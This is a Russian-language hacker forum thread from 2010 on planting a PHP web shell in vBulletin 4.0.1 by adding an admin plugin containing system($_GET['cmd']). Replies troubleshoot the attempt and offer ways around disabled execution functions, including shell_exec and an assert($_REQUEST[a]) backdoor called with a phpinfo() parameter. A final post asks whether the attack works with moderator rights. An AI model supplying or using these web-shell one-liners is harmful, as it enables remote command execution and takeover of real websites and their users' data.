шелл в vBulletin 4.0.1

Discussion in 'Песочница' started by $ereg@, 4 Feb 2010.

  1. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    создал свой плюгин
    Plugins & Products ->Add New Plugin->faq_complete
    с содержимым: system($_GET["cmd"]);
    делаю плюгин активным...
    делаю запрос:admincp/faq.php?cmd=ls
    и тупо никакой реакции :(
    в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?
     
    #1 $ereg@, 4 Feb 2010
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    system может быть в дизабл функшионс, сначала посмотри phpinfo
     
    #2 Pashkela, 4 Feb 2010
  3. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    eval попробуй заюзать
     
    #3 Bb0y, 4 Feb 2010
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    faq.php находится в корне форума..а не в админке.
     
    #4 DimOnOID, 4 Feb 2010
    1 person likes this.
  5. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)
     
    #5 $ereg@, 4 Feb 2010
  6. greenly

    greenly Banned

    Joined:
    9 Sep 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:
     
    #6 greenly, 8 Feb 2010
  7. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Воспользоваться альтернативой если такая имеется.. :)
    К примеру: shell_exec
    PHP:
    <? echo(shell_exec('id')); ?>
    Либо обходится средствами php.
     
    #7 +StArT+, 9 Feb 2010
  8. greenly

    greenly Banned

    Joined:
    9 Sep 2009
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    shell_exec, eval тоже в запрете.
    будем курить php :(
     
    #8 greenly, 9 Feb 2010
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?assert($_REQUEST[a]);?>

    http://site/script.php?a=phpinfo();

    и еще куча вариантов
     
    #9 Pashkela, 9 Feb 2010
    1 person likes this.
  10. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    181
    Likes Received:
    103
    Reputations:
    18
    А вот на счет 4.0.2 + права модера?

    Реально ли?
     
    #10 Serafim, 28 Mar 2010
(You must log in or sign up to post here.)
Loading...
Similar Threads - шелл vBulletin
  1. navai

    Подскажите шелл на PHP8, Linux 4

    navai, 16 Mar 2023, in forum: Песочница
    Replies:
    3
    Views:
    3,196
    navai
    20 Mar 2023
  2. gilo20

    Вопрос по шеллу

    gilo20, 26 Feb 2023, in forum: Песочница
    Replies:
    2
    Views:
    2,566
    crlf
    27 Feb 2023
  3. navai

    Можно ли залить .htaccess на WP? Или как залить шелл

    navai, 4 Jan 2023, in forum: Песочница
    Replies:
    3
    Views:
    3,246
    lifescore
    14 Jan 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.